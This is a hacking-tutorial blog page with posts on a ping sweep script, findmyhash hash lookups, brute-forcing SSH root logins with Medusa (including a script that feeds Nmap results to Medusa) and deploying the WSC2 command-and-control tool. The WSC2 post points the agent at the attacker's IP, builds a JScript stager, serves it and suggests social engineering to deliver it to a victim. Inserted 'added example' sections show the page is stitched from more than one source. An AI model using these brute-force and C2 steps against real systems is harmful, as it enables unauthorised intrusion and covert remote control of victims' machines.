Posts in Members Only

PingScan Python 3

July 31st, 2019 Posted by Blog, Members Only

Every hacker must know many tools for launching attacks, and must also be able to develop their own.

Here is a very bare-bones tool written in Python to which you can add features such as sending an email or raising an alert when a host you are looking for responds.

The code is as follows; we will explain it line by line so you can understand it better:

from subprocess import Popen, PIPE

# Probe 192.168.1.50 through 192.168.1.99 (range() excludes its upper bound)
for ip in range(50, 100):
    IP = '192.168.1.' + str(ip)
    # Each option and its value is a separate list element. -c 1 sends one echo
    # request; -W 1 (iputils ping) waits at most one second for the reply so an
    # unreachable host does not stall the loop.
    proc = Popen(['/bin/ping', '-c', '1', '-W', '1', IP], stdin=PIPE, stdout=PIPE, stderr=PIPE)
    stdout, stderr = proc.communicate(input=None)
    DATA = stdout.decode('UTF-8')
    if "1 received" in DATA:
        # DATA.split()[1] is the target address from ping's first line: "PING <ip> (...)"
        print("The IP address %s has responded with an ECHO_REPLY!" % (DATA.split()[1]))

You can customise this code depending on what you want it to do.

1. from subprocess import Popen, PIPE

In this first line of code we import Popen and PIPE from Python's subprocess module; these are all we need to run an external command and read its output.

2. for ip in range(50,100):

Here we create a loop over the range 50 to 99 (range() excludes its upper bound, so 100 itself is not probed). You can change this range to suit your needs.

3. IP = '192.168.1.'+str(ip)

In this line we fix the first three octets (192.168.1) and append the loop value as the fourth octet, producing the address to probe on this iteration.

4. proc = Popen(['/bin/ping', '-c', '1', '-W', '1', IP], stdin=PIPE, stdout=PIPE, stderr=PIPE)
5. stdout, stderr = proc.communicate(input=None)

In these two lines we use what we imported. Popen starts /bin/ping as a child process with the given argument list: -c 1 sends a single echo request, and -W 1 (iputils ping on Linux) waits at most one second for the reply, so an unreachable host does not hold up the loop for the default timeout. Note that each option and its value must be its own list element ('-c', '1'); a single string with a trailing space ('-c 1 ') is rejected as an invalid count by some ping versions. communicate() then waits for ping to exit and returns its standard output and standard error as bytes.

6. DATA= stdout.decode('UTF-8')

Here we decode the raw bytes read from the pipe into a string so we can search it.

7. if "1 received" in DATA:

We check whether that string contains "1 received", which is what ping prints in its summary line when the single echo request got a reply.

8. print("The IP address %s has responded with an ECHO_REPLY!" % (DATA.split()[1]))

This line goes with the previous one: if the condition is met, meaning a device answered, we print a message on the screen. DATA.split()[1] is the second whitespace-separated token of ping's output, which is the target address from its first line ("PING 192.168.1.50 (192.168.1.50) ...").

You can have an email sent or an alarm sounded if a device is found at a specific address.

Finally we get a console message with the result of our code.
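As an added example (not part of the original post), here is a version of the same sweep that you can build on. It parses ping's summary line instead of matching the literal "1 received", so it also understands BSD/macOS output ("1 packets received"), it bounds the wait per host, and it probes hosts concurrently. The /bin/ping path and the meaning of -W (seconds) assume iputils ping on Linux; the sample outputs used to exercise the parser are constructed, not captured from a real scan.

```python
import re
import subprocess
from concurrent.futures import ThreadPoolExecutor

# Summary line of iputils ping ("1 packets transmitted, 1 received, ...") and of
# BSD/macOS ping ("1 packets transmitted, 1 packets received, ...").
SUMMARY_RE = re.compile(r"(\d+) packets transmitted, (\d+)(?: packets)? received")

# Constructed sample outputs (not captured from a real scan) used to exercise parse_ping().
SAMPLE_LINUX_UP = (
    "PING 192.168.1.50 (192.168.1.50) 56(84) bytes of data.\n"
    "64 bytes from 192.168.1.50: icmp_seq=1 ttl=64 time=0.412 ms\n\n"
    "--- 192.168.1.50 ping statistics ---\n"
    "1 packets transmitted, 1 received, 0% packet loss, time 0ms\n"
)
SAMPLE_LINUX_DOWN = (
    "PING 192.168.1.51 (192.168.1.51) 56(84) bytes of data.\n\n"
    "--- 192.168.1.51 ping statistics ---\n"
    "1 packets transmitted, 0 received, 100% packet loss, time 0ms\n"
)
SAMPLE_MACOS_UP = (
    "PING 192.168.1.52 (192.168.1.52): 56 data bytes\n"
    "64 bytes from 192.168.1.52: icmp_seq=0 ttl=64 time=0.301 ms\n\n"
    "--- 192.168.1.52 ping statistics ---\n"
    "1 packets transmitted, 1 packets received, 0.0% packet loss\n"
)


def parse_ping(output):
    """Return (sent, received) from ping's summary line, or (0, 0) when no summary
    is present (for example when the target name could not be resolved)."""
    m = SUMMARY_RE.search(output)
    return (int(m.group(1)), int(m.group(2))) if m else (0, 0)


def ping_host(ip, timeout=1):
    """Send one echo request and report whether a reply came back. Each option and
    its value are separate argv elements. -W is the reply timeout in seconds on
    iputils ping (assumption: Linux); other ping implementations differ."""
    proc = subprocess.run(
        ["/bin/ping", "-c", "1", "-W", str(timeout), str(ip)],
        stdout=subprocess.PIPE, stderr=subprocess.PIPE,
    )
    sent, received = parse_ping(proc.stdout.decode("utf-8", "replace"))
    return received > 0


def sweep(targets, workers=32, prober=ping_host):
    """Probe every address in <targets> concurrently and return those that replied,
    in input order. <prober> is injectable so the logic can be tested offline."""
    targets = [str(t) for t in targets]
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = list(pool.map(prober, targets))
    return [ip for ip, up in zip(targets, results) if up]


if __name__ == "__main__":
    # Same 192.168.1.50-99 range as the original script.
    for ip in sweep("192.168.1.%d" % n for n in range(50, 100)):
        print("The IP address %s has responded with an ECHO_REPLY!" % ip)
```

The prober is passed in as a parameter so the sweep logic can be checked without sending packets; in a real run the default ping_host is used. Hosts that drop ICMP echo will still be missed, as with any ping sweep.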

If you are interested in learning more, we invite you to review this course.

Findmyhash password cracking

July 14th, 2019 Posted by Blog, Members Only

Findmyhash helps you recover the plaintext of some common hash types quickly, and it is very simple to use. The only thing you need installed on your machine is Python. Note that findmyhash does not crack hashes locally: it queries public online hash databases, so it needs an internet connection and only returns a result when the hash is already known to one of those services.

If you are passionate about cracking passwords, this is a tool you should know. The first thing to do is download the tool from the following link; this example is done on Linux.

https://code.google.com/archive/p/findmyhash/downloads

I recommend Linux Lite: it is very light and stable, it belongs to the Debian family, and its interface is very easy to use.

After downloading the file, open a terminal in the folder where the .py file is located and run it with the algorithm name and the hash to look up (findmyhash 1.1.2 is written for Python 2, so use python2 if your default python is Python 3):

python findmyhash_v1.1.2.py MD5 -h "098f6bcd4621d373cade4e832627b4f6"

This does not take long, and the result, shown in the screenshot, is the plaintext test (098f6bcd4621d373cade4e832627b4f6 is the MD5 of "test"). A second example:

python findmyhash_v1.1.2.py MD5 -h "25d55ad283aa400af464c76d713c07ad"

The result of the previous command is the plaintext 12345678 (25d55ad283aa400af464c76d713c07ad is the MD5 of "12345678").

In the previous examples we used MD5, as shown in the images, but below is the list of all the algorithms you can test with.

Accepted algorithms are:

MD4 – RFC 1320
MD5 – RFC 1321
SHA1 – RFC 3174 (FIPS 180-3)
SHA224 – RFC 3874 (FIPS 180-3)
SHA256 – FIPS 180-3
SHA384 – FIPS 180-3
SHA512 – FIPS 180-3
RMD160 – RFC 2857
GOST – RFC 5831
WHIRLPOOL – ISO/IEC 10118-3:2004
LM – Microsoft Windows hash
NTLM – Microsoft Windows hash
MYSQL – MySQL 3, 4, 5 hash
CISCO7 – Cisco IOS type 7 encrypted passwords
JUNIPER – Juniper Networks $9$ encrypted passwords
LDAP_MD5 – MD5 Base64 encoded
LDAP_SHA1 – SHA1 Base64 encoded

I invite you to try this tool with other hashes and analyse the results; it can be useful when you need a very fast answer.
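To show what such a lookup does under the hood, here is an added example (my own code, not findmyhash's) that checks a hash against a small wordlist locally with Python's hashlib. It handles the plain hex forms from the list above (MD5, SHA1, SHA224, SHA256, SHA384, SHA512) and the LDAP_MD5 / LDAP_SHA1 base64 forms; LM and NTLM are left out because MD4 is not available in every hashlib build. The wordlist is constructed for the demo; a real run would read a file such as rockyou.txt.

```python
import base64
import hashlib

# Constructed demo wordlist; a real run would read a file such as rockyou.txt.
WORDLIST = ["password", "test", "12345678", "letmein"]

# Raw hex digest lengths for the algorithms handled locally here.
HEX_ALGORITHMS = {32: "md5", 40: "sha1", 56: "sha224", 64: "sha256", 96: "sha384", 128: "sha512"}
# LDAP forms from the tool's list: "{MD5}" or "{SHA}" followed by the base64 digest.
LDAP_PREFIXES = {"{MD5}": "md5", "{SHA}": "sha1"}


def normalize(hash_string):
    """Return (hashlib algorithm name, lowercase hex digest) for a raw hex hash or
    an LDAP_MD5 / LDAP_SHA1 value; raise ValueError for anything else."""
    s = hash_string.strip()
    for prefix, alg in LDAP_PREFIXES.items():
        if s.upper().startswith(prefix):
            return alg, base64.b64decode(s[len(prefix):]).hex()
    if len(s) in HEX_ALGORITHMS and all(c in "0123456789abcdefABCDEF" for c in s):
        return HEX_ALGORITHMS[len(s)], s.lower()
    raise ValueError("unrecognised hash format: %r" % hash_string)


def lookup(hash_string, wordlist=WORDLIST):
    """Hash every candidate with the detected algorithm and return the first match,
    or None when the plaintext is not in the wordlist (the same outcome as an online
    database that has never seen the hash)."""
    alg, digest = normalize(hash_string)
    for word in wordlist:
        if hashlib.new(alg, word.encode("utf-8")).hexdigest() == digest:
            return word
    return None


if __name__ == "__main__":
    for h in ("098f6bcd4621d373cade4e832627b4f6", "25d55ad283aa400af464c76d713c07ad"):
        print(h, "->", lookup(h))
```

Algorithm detection by digest length is a heuristic: a 32-hex-character value could be MD5, MD4 or NTLM, which is why findmyhash makes you name the algorithm on the command line.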


Medusa

July 14th, 2019 Posted by Blog, Members Only

A brute-force attack recovers a key or password by trying possible combinations until you find the one that grants access.

What is Medusa?

Medusa is one of the great tools for brute-forcing logins. Working from word dictionaries, it is very stable, simple and fast, and it supports attacks against many services.

Syntax

Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]

How is it used?

Before cracking, we should establish whether the system is running an SSH service. Most likely SSH will be listening on port 22, which is the port we will check with Nmap. In a terminal, type:

nmap -sV -p 22 172.31.2.117

The -sV option is a service/version scan, while -p selects the ports to scan, in our case port 22. Other scan types in Nmap include the FIN scan (-sF) and the SYN scan (-sS); both build raw packets and therefore need root, hence sudo:

sudo -H nmap -sF -p 22 172.31.2.117

sudo -H nmap -sS -p 22 172.31.2.117

When you need to scan all the systems on the network, add /24 to the end of the IP address so the whole 256-address range is covered. It should look like this:

nmap -sV -p 22 172.31.2.0/24

On determining that an SSH service is running on port 22, we can proceed to crack.

Medusa

Medusa is a great online cracking tool, especially for SSH, Telnet and FTP services. If you haven't installed Medusa, type in a terminal:

sudo -H apt-get install medusa

On installing, type:

medusa --help

Your screen should be similar to my screenshot:

medusa -h (host) -u (username) -P (wordlist) -M ssh

Medusa doesn't include a brute-force mode that tries every possible character combination; instead, it works from a wordlist. SecLists is a good collection of wordlists that I've found on the internet. How long Medusa takes depends on the size of your wordlist, on the quality of your network connection and on how quickly the target answers each attempt. In my opinion, the root account is what you'd want to try and crack. There are several modules; since we are cracking the SSH password, the -M flag is set to ssh.
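Chaining the two steps above, here is an added example (not from the Medusa or Nmap projects) that reads Nmap's grepable output (nmap -oG), keeps only the hosts that actually have the SSH port open, writes them to a file, and hands that file to Medusa with -H instead of running one -h at a time. The sample -oG text is constructed, not real scan output. The flags used are Medusa's own: -H host file, -n port, -t parallel logins per host, -e ns to also try an empty password and the username as password, -f to stop on a host after the first valid pair, -O log file.

```python
import shutil
import subprocess

# Constructed sample of nmap -oG (grepable) output; not real scan results.
# Each host is one line: "Host: <ip> (<name>)<TAB>Ports: <port>/<state>/<proto>//<svc>//<ver>/, ..."
SAMPLE_GNMAP = """# Nmap 7.80 scan initiated (constructed sample)
Host: 172.31.2.117 ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.9p1 (protocol 2.0)/
Host: 172.31.2.118 ()\tPorts: 22/closed/tcp//ssh///
Host: 172.31.2.119 ()\tPorts: 22/filtered/tcp//ssh///, 2222/open/tcp//ssh//OpenSSH 8.0/
# Nmap done: 3 IP addresses (3 hosts up) scanned
"""


def hosts_with_open_port(gnmap_text, port=22):
    """Return the IPs whose -oG line lists <port>/open/tcp, in scan order."""
    hosts = []
    for line in gnmap_text.splitlines():
        if not line.startswith("Host: ") or "Ports: " not in line:
            continue
        ip = line.split()[1]
        # Everything after "Ports: " up to the next tab (e.g. "Ignored State:") is the port list.
        ports_field = line.split("Ports: ", 1)[1].split("\t")[0]
        for entry in ports_field.split(", "):
            fields = entry.split("/")
            if fields[0] == str(port) and fields[1] == "open":
                hosts.append(ip)
                break
    return hosts


def medusa_command(hosts_file, wordlist, user="root", port=22, threads=4):
    """Build the medusa argv for the SSH module (see flag meanings in the lead-in)."""
    return ["medusa", "-H", hosts_file, "-u", user, "-P", wordlist, "-M", "ssh",
            "-n", str(port), "-t", str(threads), "-e", "ns", "-f", "-O", "medusa.log"]


def run_ssh_audit(gnmap_path, wordlist, port=22):
    """Parse the -oG file, write ssh_hosts.txt and run medusa against it.
    Returns medusa's exit code, or None when there is nothing to do."""
    with open(gnmap_path) as fh:
        hosts = hosts_with_open_port(fh.read(), port)
    if not hosts:
        print("no hosts with port %d open" % port)
        return None
    with open("ssh_hosts.txt", "w") as fh:
        fh.write("\n".join(hosts) + "\n")
    if shutil.which("medusa") is None:
        print("medusa is not installed (sudo apt-get install medusa)")
        return None
    return subprocess.run(medusa_command("ssh_hosts.txt", wordlist, port=port)).returncode


if __name__ == "__main__":
    # Offline demo on the constructed sample; a real run would be, for example:
    #   nmap -sV -p 22 -oG ssh.gnmap 172.31.2.0/24 && python3 this_script.py
    print(hosts_with_open_port(SAMPLE_GNMAP))
    print(" ".join(medusa_command("ssh_hosts.txt", "rockyou.txt")))
```

Keep -t low against SSH: most servers cap concurrent unauthenticated connections (MaxStartups in OpenSSH) and fail2ban-style tools will ban the source after a few failures, which makes a large thread count slower, not faster.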


WSC2

July 7th, 2019 Posted by Blog, Members Only

Introduction

WSC2 is a PoC of using WebSockets and a browser process as a C2 communication channel between an agent, running on the target system, and a controller acting as the actual C2 server.

Installation

We clone the repository with the following command:

$ git clone https://github.com/Arno0x/WSC2.git

We enter the folder and list its contents:

$ cd WSC2/
$ ls

We install the requirements; remember to create a virtual environment with virtualenv first:

$ pip install -r requirements.txt

We edit the following file (with nano, or with vim as we did here) and set the CALLBACK variable to the IP address of the attacking machine, that is, the address the agent will connect back to:

$ vim config.py

Then we start the controller with the following command and press Enter:

$ ./wsc2.py

We are going to generate a stager file. There are several stager types to choose from: this tool provides jscript1, jscript2 and jscript3. We use jscript1 here because it does not need to be compiled; the other stagers do. The following command, typed at the WSC2 controller prompt, creates wsc2Agent1.js in the stagers directory:

$ genStager jscript1

We open a new terminal and go to the same location:

$ cd WSC2/

Then we enter the stagers folder and serve it over HTTP so the target can fetch the file. SimpleHTTPServer is the Python 2 module; on Python 3 the equivalent is python3 -m http.server 80. Binding port 80 requires root:

$ cd stagers/
$ python -m SimpleHTTPServer 80

This is what you would see when fetching the file from another machine. You can also use social engineering to deliver this file to the victim.
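For readers who want to see what the channel WSC2 rides on looks like on the wire, here is an added example of my own (not WSC2's code) implementing the two pieces of RFC 6455 that any such agent and controller must speak: the HTTP Upgrade handshake, with the Sec-WebSocket-Accept value the controller must answer, and the masked data frames the agent sends. Client-to-server frames are always masked with a per-frame key, which is one reason a WebSocket C2 payload is not readable as plaintext in a packet capture even without TLS; the Upgrade headers, on the other hand, are plain HTTP and are what a proxy or IDS can see. The host name and path are illustrative.

```python
import base64
import hashlib
import os
import struct

# Fixed GUID from RFC 6455 section 4.2.2, mixed into the client key to derive the accept value.
WS_GUID = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"


def accept_key(client_key):
    """Sec-WebSocket-Accept the controller must return for the agent's Sec-WebSocket-Key."""
    digest = hashlib.sha1((client_key + WS_GUID).encode("ascii")).digest()
    return base64.b64encode(digest).decode("ascii")


def upgrade_request(host, path="/", key=None):
    """HTTP/1.1 Upgrade request that opens the channel (agent side). Returns (request, key).
    Host and path are illustrative; WSC2 issues its own request via the browser process."""
    key = key or base64.b64encode(os.urandom(16)).decode("ascii")
    request = (
        "GET %s HTTP/1.1\r\nHost: %s\r\nUpgrade: websocket\r\nConnection: Upgrade\r\n"
        "Sec-WebSocket-Key: %s\r\nSec-WebSocket-Version: 13\r\n\r\n" % (path, host, key)
    )
    return request, key


def upgrade_response(client_key):
    """101 response the controller answers with; the accept value proves it read the key."""
    return (
        "HTTP/1.1 101 Switching Protocols\r\nUpgrade: websocket\r\nConnection: Upgrade\r\n"
        "Sec-WebSocket-Accept: %s\r\n\r\n" % accept_key(client_key)
    )


def mask_frame(payload, mask, opcode=0x1, fin=True):
    """Build one client-to-server frame (RFC 6455 section 5.2). Client frames MUST be
    masked with a 4-byte key that changes per frame, so the C2 payload is not visible
    as plaintext in the TCP stream even without TLS. Opcode 0x1 = text, 0x2 = binary."""
    header = bytes([(0x80 if fin else 0x00) | opcode])
    n = len(payload)
    if n < 126:
        header += bytes([0x80 | n])
    elif n < 65536:
        header += bytes([0x80 | 126]) + struct.pack("!H", n)
    else:
        header += bytes([0x80 | 127]) + struct.pack("!Q", n)
    masked = bytes(b ^ mask[i % 4] for i, b in enumerate(payload))
    return header + mask + masked


def unmask_frame(frame):
    """Parse a masked frame into (opcode, payload), as the controller does on receipt.
    A server must reject unmasked client frames (RFC 6455 section 5.1)."""
    opcode = frame[0] & 0x0F
    if not frame[1] & 0x80:
        raise ValueError("client frame without mask bit")
    n, pos = frame[1] & 0x7F, 2
    if n == 126:
        n, pos = struct.unpack("!H", frame[2:4])[0], 4
    elif n == 127:
        n, pos = struct.unpack("!Q", frame[2:10])[0], 10
    mask, data = frame[pos:pos + 4], frame[pos + 4:pos + 4 + n]
    return opcode, bytes(b ^ mask[i % 4] for i, b in enumerate(data))


if __name__ == "__main__":
    request, key = upgrade_request("c2.example.invalid", "/ws")
    print(request)
    print(upgrade_response(key))
    frame = mask_frame(b"Hello", os.urandom(4))
    print(frame.hex(), unmask_frame(frame))
```

The masking key is sent in the clear in front of the payload, so it is not encryption: anyone reassembling the stream can unmask it, as unmask_frame shows. What it defeats is naive signature matching on the raw bytes, which is why inspection of WebSocket C2 traffic has to happen after frame parsing (or at the browser process, as WSC2's use of a real browser suggests).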

Resources:

github.com/Arno0x/WSC2

